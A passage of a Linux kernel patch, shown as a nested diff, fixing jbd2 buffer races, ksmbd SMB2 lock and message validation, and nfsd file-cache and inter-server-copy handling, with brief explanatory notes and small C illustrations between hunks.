+@@ -295,11 +295,11 @@ static void hfsplus_put_super(struct super_block *sb)
+ 		hfsplus_sync_fs(sb, 1);
+ 	}
+ 
++	iput(sbi->alloc_file);
++	iput(sbi->hidden_dir);
+ 	hfs_btree_close(sbi->attr_tree);
+ 	hfs_btree_close(sbi->cat_tree);
+ 	hfs_btree_close(sbi->ext_tree);
+-	iput(sbi->alloc_file);
+-	iput(sbi->hidden_dir);
+ 	kfree(sbi->s_vhdr_buf);
+ 	kfree(sbi->s_backup_vhdr_buf);
+ 	unload_nls(sbi->nls);
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 6a404ac1c178f..15de1385012eb 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -1010,36 +1010,28 @@ repeat:
+ 	 * ie. locked but not dirty) or tune2fs (which may actually have
+ 	 * the buffer dirtied, ugh.)  */
+ 
+-	if (buffer_dirty(bh)) {
++	if (buffer_dirty(bh) && jh->b_transaction) {
++		warn_dirty_buffer(bh);
+ 		/*
+-		 * First question: is this buffer already part of the current
+-		 * transaction or the existing committing transaction?
+-		 */
+-		if (jh->b_transaction) {
+-			J_ASSERT_JH(jh,
+-				jh->b_transaction == transaction ||
+-				jh->b_transaction ==
+-					journal->j_committing_transaction);
+-			if (jh->b_next_transaction)
+-				J_ASSERT_JH(jh, jh->b_next_transaction ==
+-							transaction);
+-			warn_dirty_buffer(bh);
+-		}
+-		/*
+-		 * In any case we need to clean the dirty flag and we must
+-		 * do it under the buffer lock to be sure we don't race
+-		 * with running write-out.
++		 * We need to clean the dirty flag and we must do it under the
++		 * buffer lock to be sure we don't race with running write-out.
+ 		 */
+ 		JBUFFER_TRACE(jh, "Journalling dirty buffer");
+ 		clear_buffer_dirty(bh);
++		/*
++		 * The buffer is going to be added to BJ_Reserved list now and
++		 * nothing guarantees jbd2_journal_dirty_metadata() will be
++		 * ever called for it. So we need to set jbddirty bit here to
++		 * make sure the buffer is dirtied and written out when the
++		 * journaling machinery is done with it.
++		 */
+ 		set_buffer_jbddirty(bh);
+ 	}
+ 
+-	unlock_buffer(bh);
+-
+ 	error = -EROFS;
+ 	if (is_handle_aborted(handle)) {
+ 		spin_unlock(&jh->b_state_lock);
++		unlock_buffer(bh);
+ 		goto out;
+ 	}
+ 	error = 0;
+@@ -1049,8 +1041,10 @@ repeat:
+ 	 * b_next_transaction points to it
+ 	 */
+ 	if (jh->b_transaction == transaction ||
+-	    jh->b_next_transaction == transaction)
++	    jh->b_next_transaction == transaction) {
++		unlock_buffer(bh);
+ 		goto done;
++	}
+ 
+ 	/*
+ 	 * this is the first time this transaction is touching this buffer,
+@@ -1074,10 +1068,24 @@ repeat:
+ 		 */
+ 		smp_wmb();
+ 		spin_lock(&journal->j_list_lock);
++		if (test_clear_buffer_dirty(bh)) {
++			/*
++			 * Clear the dirty bit and assign jh->b_transaction
++			 * under journal->j_list_lock so that bh cannot be
++			 * removed from the checkpoint list while
++			 * the buffer is in an intermediate state (not dirty
++			 * and jh->b_transaction is NULL).
++			 */
++			JBUFFER_TRACE(jh, "Journalling dirty buffer");
++			set_buffer_jbddirty(bh);
++		}
+ 		__jbd2_journal_file_buffer(jh, transaction, BJ_Reserved);
+ 		spin_unlock(&journal->j_list_lock);
++		unlock_buffer(bh);
+ 		goto done;
+ 	}
++	unlock_buffer(bh);
++
+ 	/*
+ 	 * If there is already a copy-out version of this buffer, then we don't
+ 	 * need to make another one
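
The jbd2 hunks above delay unlock_buffer() and clear the dirty bit
together with the BJ_Reserved filing under journal->j_list_lock, so no
other context can see the buffer with the dirty bit already cleared but
jh->b_transaction still NULL. A pthreads sketch of that invariant,
with illustrative names only:

  #include <pthread.h>
  #include <stddef.h>

  struct jbuf {
          pthread_mutex_t list_lock;
          int dirty;              /* stands in for the BH dirty bit */
          void *transaction;      /* stands in for jh->b_transaction */
  };

  static void file_buffer(struct jbuf *b, void *txn)
  {
          pthread_mutex_lock(&b->list_lock);
          /* flag cleared and owner set in one critical section, so an
           * observer never sees (dirty == 0 && transaction == NULL) */
          b->dirty = 0;
          b->transaction = txn;
          pthread_mutex_unlock(&b->list_lock);
  }
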
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+index 6e25ace365684..fbdde426dd01d 100644
+--- a/fs/ksmbd/smb2misc.c
++++ b/fs/ksmbd/smb2misc.c
+@@ -149,15 +149,11 @@ static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+ 		break;
+ 	case SMB2_LOCK:
+ 	{
+-		int lock_count;
++		unsigned short lock_count;
+ 
+-		/*
+-		 * smb2_lock request size is 48 included single
+-		 * smb2_lock_element structure size.
+-		 */
+-		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount) - 1;
++		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
+ 		if (lock_count > 0) {
+-			*off = __SMB2_HEADER_STRUCTURE_SIZE + 48;
++			*off = offsetof(struct smb2_lock_req, locks);
+ 			*len = sizeof(struct smb2_lock_element) * lock_count;
+ 		}
+ 		break;
+@@ -412,20 +408,19 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 			goto validate_credit;
+ 
+ 		/*
+-		 * windows client also pad up to 8 bytes when compounding.
+-		 * If pad is longer than eight bytes, log the server behavior
+-		 * (once), since may indicate a problem but allow it and
+-		 * continue since the frame is parseable.
++		 * SMB2 NEGOTIATE request will be validated when message
++		 * handling proceeds.
+ 		 */
+-		if (clc_len < len) {
+-			ksmbd_debug(SMB,
+-				    "cli req padded more than expected. Length %d not %d for cmd:%d mid:%llu\n",
+-				    len, clc_len, command,
+-				    le64_to_cpu(hdr->MessageId));
++		if (command == SMB2_NEGOTIATE_HE)
++			goto validate_credit;
++
++		/*
++		 * Allow a message that is padded to an 8-byte boundary.
++		 */
++		if (clc_len < len && (len - clc_len) < 8)
+ 			goto validate_credit;
+-		}
+ 
+-		ksmbd_debug(SMB,
++		pr_err_ratelimited(
+ 			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
+ 			    len, clc_len, command,
+ 			    le64_to_cpu(hdr->MessageId));
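
The smb2misc.c change above also replaces the hand-computed
"__SMB2_HEADER_STRUCTURE_SIZE + 48" with offsetof(), so the data-area
offset follows the structure layout instead of a magic constant.
Illustrated with a stand-in struct (not the real smb2_lock_req
definition):

  #include <stddef.h>
  #include <stdio.h>

  struct lock_req {                       /* stand-in layout */
          unsigned short StructureSize;
          unsigned short LockCount;
          unsigned int   Reserved;
          unsigned long long locks[];     /* variable-length tail */
  };

  int main(void)
  {
          /* derived from the type, not hard-coded */
          printf("locks[] begins at byte %zu\n",
                 offsetof(struct lock_req, locks));
          return 0;
  }
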
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 9b16ee657b51a..0f0f1243a9cbf 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -6642,7 +6642,7 @@ int smb2_cancel(struct ksmbd_work *work)
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+ 	struct smb2_hdr *chdr;
+-	struct ksmbd_work *cancel_work = NULL, *iter;
++	struct ksmbd_work *iter;
+ 	struct list_head *command_list;
+ 
+ 	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+@@ -6664,7 +6664,9 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->Id.AsyncId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
++			if (iter->cancel_fn)
++				iter->cancel_fn(iter->cancel_argv);
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+@@ -6683,18 +6685,12 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with mid %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->MessageId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+ 	}
+ 
+-	if (cancel_work) {
+-		cancel_work->state = KSMBD_WORK_CANCELLED;
+-		if (cancel_work->cancel_fn)
+-			cancel_work->cancel_fn(cancel_work->cancel_argv);
+-	}
+-
+ 	/* For SMB2_CANCEL command itself send no response*/
+ 	work->send_no_response = 1;
+ 	return 0;
+@@ -7055,6 +7051,14 @@ skip:
+ 
+ 				ksmbd_vfs_posix_lock_wait(flock);
+ 
++				spin_lock(&work->conn->request_lock);
++				spin_lock(&fp->f_lock);
++				list_del(&work->fp_entry);
++				work->cancel_fn = NULL;
++				kfree(argv);
++				spin_unlock(&fp->f_lock);
++				spin_unlock(&work->conn->request_lock);
++
+ 				if (work->state != KSMBD_WORK_ACTIVE) {
+ 					list_del(&smb_lock->llist);
+ 					spin_lock(&work->conn->llist_lock);
+@@ -7063,9 +7067,6 @@ skip:
+ 					locks_free_lock(flock);
+ 
+ 					if (work->state == KSMBD_WORK_CANCELLED) {
+-						spin_lock(&fp->f_lock);
+-						list_del(&work->fp_entry);
+-						spin_unlock(&fp->f_lock);
+ 						rsp->hdr.Status =
+ 							STATUS_CANCELLED;
+ 						kfree(smb_lock);
+@@ -7087,9 +7088,6 @@ skip:
+ 				list_del(&smb_lock->clist);
+ 				spin_unlock(&work->conn->llist_lock);
+ 
+-				spin_lock(&fp->f_lock);
+-				list_del(&work->fp_entry);
+-				spin_unlock(&fp->f_lock);
+ 				goto retry;
+ 			} else if (!rc) {
+ 				spin_lock(&work->conn->llist_lock);
+diff --git a/fs/ksmbd/vfs_cache.c b/fs/ksmbd/vfs_cache.c
+index da9163b003503..0ae5dd0829e92 100644
+--- a/fs/ksmbd/vfs_cache.c
++++ b/fs/ksmbd/vfs_cache.c
+@@ -364,12 +364,11 @@ static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
+ 
+ static void set_close_state_blocked_works(struct ksmbd_file *fp)
+ {
+-	struct ksmbd_work *cancel_work, *ctmp;
++	struct ksmbd_work *cancel_work;
+ 
+ 	spin_lock(&fp->f_lock);
+-	list_for_each_entry_safe(cancel_work, ctmp, &fp->blocked_works,
++	list_for_each_entry(cancel_work, &fp->blocked_works,
+ 				 fp_entry) {
+-		list_del(&cancel_work->fp_entry);
+ 		cancel_work->state = KSMBD_WORK_CLOSED;
+ 		cancel_work->cancel_fn(cancel_work->cancel_argv);
+ 	}
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index e51044a5f550f..d70da78e698d2 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -10609,7 +10609,9 @@ static void nfs4_disable_swap(struct inode *inode)
+ 	/* The state manager thread will now exit once it is
+ 	 * woken.
+ 	 */
+-	wake_up_var(&NFS_SERVER(inode)->nfs_client->cl_state);
++	struct nfs_client *clp = NFS_SERVER(inode)->nfs_client;
++
++	nfs4_schedule_state_manager(clp);
+ }
+ 
+ static const struct inode_operations nfs4_dir_inode_operations = {
+diff --git a/fs/nfs/nfs4trace.h b/fs/nfs/nfs4trace.h
+index 2cff5901c6894..3fa77ad7258f2 100644
+--- a/fs/nfs/nfs4trace.h
++++ b/fs/nfs/nfs4trace.h
+@@ -292,32 +292,34 @@ TRACE_DEFINE_ENUM(NFS4CLNT_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_LEASE_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_DELEGATION_EXPIRED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RUN_MANAGER);
++TRACE_DEFINE_ENUM(NFS4CLNT_MANAGER_AVAILABLE);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_RUNNING);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_READ);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_RW);
++TRACE_DEFINE_ENUM(NFS4CLNT_DELEGRETURN_DELAYED);
+ 
+ #define show_nfs4_clp_state(state) \
+ 	__print_flags(state, "|", \
+-		{ NFS4CLNT_MANAGER_RUNNING,	"MANAGER_RUNNING" }, \
+-		{ NFS4CLNT_CHECK_LEASE,		"CHECK_LEASE" }, \
+-		{ NFS4CLNT_LEASE_EXPIRED,	"LEASE_EXPIRED" }, \
+-		{ NFS4CLNT_RECLAIM_REBOOT,	"RECLAIM_REBOOT" }, \
+-		{ NFS4CLNT_RECLAIM_NOGRACE,	"RECLAIM_NOGRACE" }, \
+-		{ NFS4CLNT_DELEGRETURN,		"DELEGRETURN" }, \
+-		{ NFS4CLNT_SESSION_RESET,	"SESSION_RESET" }, \
+-		{ NFS4CLNT_LEASE_CONFIRM,	"LEASE_CONFIRM" }, \
+-		{ NFS4CLNT_SERVER_SCOPE_MISMATCH, \
+-						"SERVER_SCOPE_MISMATCH" }, \
+-		{ NFS4CLNT_PURGE_STATE,		"PURGE_STATE" }, \
+-		{ NFS4CLNT_BIND_CONN_TO_SESSION, \
+-						"BIND_CONN_TO_SESSION" }, \
+-		{ NFS4CLNT_MOVED,		"MOVED" }, \
+-		{ NFS4CLNT_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ NFS4CLNT_DELEGATION_EXPIRED,	"DELEGATION_EXPIRED" }, \
+-		{ NFS4CLNT_RUN_MANAGER,		"RUN_MANAGER" }, \
+-		{ NFS4CLNT_RECALL_RUNNING,	"RECALL_RUNNING" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_READ, "RECALL_ANY_LAYOUT_READ" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_RW, "RECALL_ANY_LAYOUT_RW" })
++	{ BIT(NFS4CLNT_MANAGER_RUNNING),	"MANAGER_RUNNING" }, \
++	{ BIT(NFS4CLNT_CHECK_LEASE),		"CHECK_LEASE" }, \
++	{ BIT(NFS4CLNT_LEASE_EXPIRED),	"LEASE_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RECLAIM_REBOOT),	"RECLAIM_REBOOT" }, \
++	{ BIT(NFS4CLNT_RECLAIM_NOGRACE),	"RECLAIM_NOGRACE" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN),		"DELEGRETURN" }, \
++	{ BIT(NFS4CLNT_SESSION_RESET),	"SESSION_RESET" }, \
++	{ BIT(NFS4CLNT_LEASE_CONFIRM),	"LEASE_CONFIRM" }, \
++	{ BIT(NFS4CLNT_SERVER_SCOPE_MISMATCH),	"SERVER_SCOPE_MISMATCH" }, \
++	{ BIT(NFS4CLNT_PURGE_STATE),		"PURGE_STATE" }, \
++	{ BIT(NFS4CLNT_BIND_CONN_TO_SESSION),	"BIND_CONN_TO_SESSION" }, \
++	{ BIT(NFS4CLNT_MOVED),		"MOVED" }, \
++	{ BIT(NFS4CLNT_LEASE_MOVED),		"LEASE_MOVED" }, \
++	{ BIT(NFS4CLNT_DELEGATION_EXPIRED),	"DELEGATION_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RUN_MANAGER),		"RUN_MANAGER" }, \
++	{ BIT(NFS4CLNT_MANAGER_AVAILABLE), "MANAGER_AVAILABLE" }, \
++	{ BIT(NFS4CLNT_RECALL_RUNNING),	"RECALL_RUNNING" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_READ), "RECALL_ANY_LAYOUT_READ" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_RW), "RECALL_ANY_LAYOUT_RW" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN_DELAYED), "DELEGRETURN_DELAYED" })
+ 
+ TRACE_EVENT(nfs4_state_mgr,
+ 		TP_PROTO(
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index 142b3c928f76e..5cb8cce153a57 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -309,37 +309,27 @@ nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
+ 	return nf;
+ }
+ 
++/**
++ * nfsd_file_check_write_error - check for writeback errors on a file
++ * @nf: nfsd_file to check for writeback errors
++ *
++ * Check whether a nfsd_file has an unseen error. Reset the write
++ * verifier if so.
++ */
+ static void
+-nfsd_file_fsync(struct nfsd_file *nf)
+-{
+-	struct file *file = nf->nf_file;
+-	int ret;
+-
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return;
+-	ret = vfs_fsync(file, 1);
+-	trace_nfsd_file_fsync(nf, ret);
+-	if (ret)
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+-}
+-
+-static int
+ nfsd_file_check_write_error(struct nfsd_file *nf)
+ {
+ 	struct file *file = nf->nf_file;
+ 
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return 0;
+-	return filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err));
++	if ((file->f_mode & FMODE_WRITE) &&
++	    filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err)))
++		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ }
+ 
+ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+ 	trace_nfsd_file_unhash(nf);
+-
+-	if (nfsd_file_check_write_error(nf))
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ 	rhashtable_remove_fast(&nfsd_file_rhash_tbl, &nf->nf_rhash,
+ 			       nfsd_file_rhash_params);
+ }
+@@ -365,23 +355,12 @@ nfsd_file_free(struct nfsd_file *nf)
+ 	this_cpu_add(nfsd_file_total_age, age);
+ 
+ 	nfsd_file_unhash(nf);
+-
+-	/*
+-	 * We call fsync here in order to catch writeback errors. It's not
+-	 * strictly required by the protocol, but an nfsd_file could get
+-	 * evicted from the cache before a COMMIT comes in. If another
+-	 * task were to open that file in the interim and scrape the error,
+-	 * then the client may never see it. By calling fsync here, we ensure
+-	 * that writeback happens before the entry is freed, and that any
+-	 * errors reported result in the write verifier changing.
+-	 */
+-	nfsd_file_fsync(nf);
+-
+ 	if (nf->nf_mark)
+ 		nfsd_file_mark_put(nf->nf_mark);
+ 	if (nf->nf_file) {
+ 		get_file(nf->nf_file);
+ 		filp_close(nf->nf_file, NULL);
++		nfsd_file_check_write_error(nf);
+ 		fput(nf->nf_file);
+ 	}
+ 
+@@ -1136,6 +1115,7 @@ wait_for_construction:
+ out:
+ 	if (status == nfs_ok) {
+ 		this_cpu_inc(nfsd_file_acquisitions);
++		nfsd_file_check_write_error(nf);
+ 		*pnf = nf;
+ 	} else {
+ 		if (refcount_dec_and_test(&nf->nf_ref))
+diff --git a/fs/nfsd/nfs4layouts.c b/fs/nfsd/nfs4layouts.c
+index 3564d1c6f6104..e8a80052cb1ba 100644
+--- a/fs/nfsd/nfs4layouts.c
++++ b/fs/nfsd/nfs4layouts.c
+@@ -323,11 +323,11 @@ nfsd4_recall_file_layout(struct nfs4_layout_stateid *ls)
+ 	if (ls->ls_recalled)
+ 		goto out_unlock;
+ 
+-	ls->ls_recalled = true;
+-	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	if (list_empty(&ls->ls_layouts))
+ 		goto out_unlock;
+ 
++	ls->ls_recalled = true;
++	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	trace_nfsd_layout_recall(&ls->ls_stid.sc_stateid);
+ 
+ 	refcount_inc(&ls->ls_stid.sc_count);
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index ba04ce9b9fa51..a90e792a94d77 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1227,8 +1227,10 @@ out:
+ 	return status;
+ out_put_dst:
+ 	nfsd_file_put(*dst);
++	*dst = NULL;
+ out_put_src:
+ 	nfsd_file_put(*src);
++	*src = NULL;
+ 	goto out;
+ }
+ 
+@@ -1306,15 +1308,15 @@ extern void nfs_sb_deactive(struct super_block *sb);
+  * setup a work entry in the ssc delayed unmount list.
+  */
+ static __be32 nfsd4_ssc_setup_dul(struct nfsd_net *nn, char *ipaddr,
+-		struct nfsd4_ssc_umount_item **retwork, struct vfsmount **ss_mnt)
++				  struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd4_ssc_umount_item *tmp;
+ 	DEFINE_WAIT(wait);
++	__be32 status = 0;
+ 
+-	*ss_mnt = NULL;
+-	*retwork = NULL;
++	*nsui = NULL;
+ 	work = kzalloc(sizeof(*work), GFP_KERNEL);
+ try_again:
+ 	spin_lock(&nn->nfsd_ssc_lock);
+@@ -1338,12 +1340,12 @@ try_again:
+ 			finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 			goto try_again;
+ 		}
+-		*ss_mnt = ni->nsui_vfsmount;
++		*nsui = ni;
+ 		refcount_inc(&ni->nsui_refcnt);
+ 		spin_unlock(&nn->nfsd_ssc_lock);
+ 		kfree(work);
+ 
+-		/* return vfsmount in ss_mnt */
++		/* return vfsmount in (*nsui)->nsui_vfsmount */
+ 		return 0;
+ 	}
+ 	if (work) {
+@@ -1351,31 +1353,32 @@ try_again:
+ 		refcount_set(&work->nsui_refcnt, 2);
+ 		work->nsui_busy = true;
+ 		list_add_tail(&work->nsui_list, &nn->nfsd_ssc_mount_list);
+-		*retwork = work;
+-	}
++		*nsui = work;
++	} else
++		status = nfserr_resource;
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	return 0;
++	return status;
+ }
+ 
+-static void nfsd4_ssc_update_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work, struct vfsmount *ss_mnt)
++static void nfsd4_ssc_update_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui,
++				 struct vfsmount *ss_mnt)
+ {
+-	/* set nsui_vfsmount, clear busy flag and wakeup waiters */
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	work->nsui_vfsmount = ss_mnt;
+-	work->nsui_busy = false;
++	nsui->nsui_vfsmount = ss_mnt;
++	nsui->nsui_busy = false;
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+ }
+ 
+-static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work)
++static void nfsd4_ssc_cancel_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui)
+ {
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	list_del(&work->nsui_list);
++	list_del(&nsui->nsui_list);
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	kfree(work);
++	kfree(nsui);
+ }
+ 
+ /*
+@@ -1383,7 +1386,7 @@ static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+  */
+ static __be32
+ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+-		       struct vfsmount **mount)
++		       struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct file_system_type *type;
+ 	struct vfsmount *ss_mnt;
+@@ -1394,7 +1397,6 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	char *ipaddr, *dev_name, *raw_data;
+ 	int len, raw_len;
+ 	__be32 status = nfserr_inval;
+-	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 
+ 	naddr = &nss->u.nl4_addr;
+@@ -1402,6 +1404,7 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 					 naddr->addr_len,
+ 					 (struct sockaddr *)&tmp_addr,
+ 					 sizeof(tmp_addr));
++	*nsui = NULL;
+ 	if (tmp_addrlen == 0)
+ 		goto out_err;
+ 
+@@ -1444,10 +1447,10 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 		goto out_free_rawdata;
+ 	snprintf(dev_name, len + 5, "%s%s%s:/", startsep, ipaddr, endsep);
+ 
+-	status = nfsd4_ssc_setup_dul(nn, ipaddr, &work, &ss_mnt);
++	status = nfsd4_ssc_setup_dul(nn, ipaddr, nsui);
+ 	if (status)
+ 		goto out_free_devname;
+-	if (ss_mnt)
++	if ((*nsui)->nsui_vfsmount)
+ 		goto out_done;
+ 
+ 	/* Use an 'internal' mount: SB_KERNMOUNT -> MNT_INTERNAL */
+@@ -1455,15 +1458,12 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	module_put(type->owner);
+ 	if (IS_ERR(ss_mnt)) {
+ 		status = nfserr_nodev;
+-		if (work)
+-			nfsd4_ssc_cancel_dul_work(nn, work);
++		nfsd4_ssc_cancel_dul(nn, *nsui);
+ 		goto out_free_devname;
+ 	}
+-	if (work)
+-		nfsd4_ssc_update_dul_work(nn, work, ss_mnt);
++	nfsd4_ssc_update_dul(nn, *nsui, ss_mnt);
+ out_done:
+ 	status = 0;
+-	*mount = ss_mnt;
+ 
+ out_free_devname:
+ 	kfree(dev_name);
+@@ -1487,7 +1487,7 @@ out_err:
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy, struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+ 	struct svc_fh *s_fh = NULL;
+ 	stateid_t *s_stid = &copy->cp_src_stateid;
+@@ -1500,7 +1500,7 @@ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 	if (status)
+ 		goto out;
+ 
+-	status = nfsd4_interssc_connect(copy->cp_src, rqstp, mount);
++	status = nfsd4_interssc_connect(copy->cp_src, rqstp, &copy->ss_nsui);
+ 	if (status)
+ 		goto out;
+ 
+@@ -1518,45 +1518,26 @@ out:
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+-	bool found = false;
+-	long timeout;
+-	struct nfsd4_ssc_umount_item *tmp;
+-	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd_net *nn = net_generic(dst->nf_net, nfsd_net_id);
++	long timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+ 
+ 	nfs42_ssc_close(filp);
+-	nfsd_file_put(dst);
+ 	fput(filp);
+ 
+-	if (!nn) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+-	list_for_each_entry_safe(ni, tmp, &nn->nfsd_ssc_mount_list, nsui_list) {
+-		if (ni->nsui_vfsmount->mnt_sb == ss_mnt->mnt_sb) {
+-			list_del(&ni->nsui_list);
+-			/*
+-			 * vfsmount can be shared by multiple exports,
+-			 * decrement refcnt. If the count drops to 1 it
+-			 * will be unmounted when nsui_expire expires.
+-			 */
+-			refcount_dec(&ni->nsui_refcnt);
+-			ni->nsui_expire = jiffies + timeout;
+-			list_add_tail(&ni->nsui_list, &nn->nfsd_ssc_mount_list);
+-			found = true;
+-			break;
+-		}
+-	}
++	list_del(&nsui->nsui_list);
++	/*
++	 * vfsmount can be shared by multiple exports,
++	 * decrement refcnt. If the count drops to 1 it
++	 * will be unmounted when nsui_expire expires.
++	 */
++	refcount_dec(&nsui->nsui_refcnt);
++	nsui->nsui_expire = jiffies + timeout;
++	list_add_tail(&nsui->nsui_list, &nn->nfsd_ssc_mount_list);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	if (!found) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ }
+ 
+ #else /* CONFIG_NFSD_V4_2_INTER_SSC */
+@@ -1564,15 +1545,13 @@ nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy,
+-		      struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+-	*mount = NULL;
+ 	return nfserr_inval;
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+ }
+@@ -1595,13 +1574,6 @@ nfsd4_setup_intra_ssc(struct svc_rqst *rqstp,
+ 				 &copy->nf_dst);
+ }
+ 
+-static void
+-nfsd4_cleanup_intra_ssc(struct nfsd_file *src, struct nfsd_file *dst)
+-{
+-	nfsd_file_put(src);
+-	nfsd_file_put(dst);
+-}
+-
+ static void nfsd4_cb_offload_release(struct nfsd4_callback *cb)
+ {
+ 	struct nfsd4_cb_offload *cbo =
+@@ -1713,18 +1685,27 @@ static void dup_copy_fields(struct nfsd4_copy *src, struct nfsd4_copy *dst)
+ 	memcpy(dst->cp_src, src->cp_src, sizeof(struct nl4_server));
+ 	memcpy(&dst->stateid, &src->stateid, sizeof(src->stateid));
+ 	memcpy(&dst->c_fh, &src->c_fh, sizeof(src->c_fh));
+-	dst->ss_mnt = src->ss_mnt;
++	dst->ss_nsui = src->ss_nsui;
++}
++
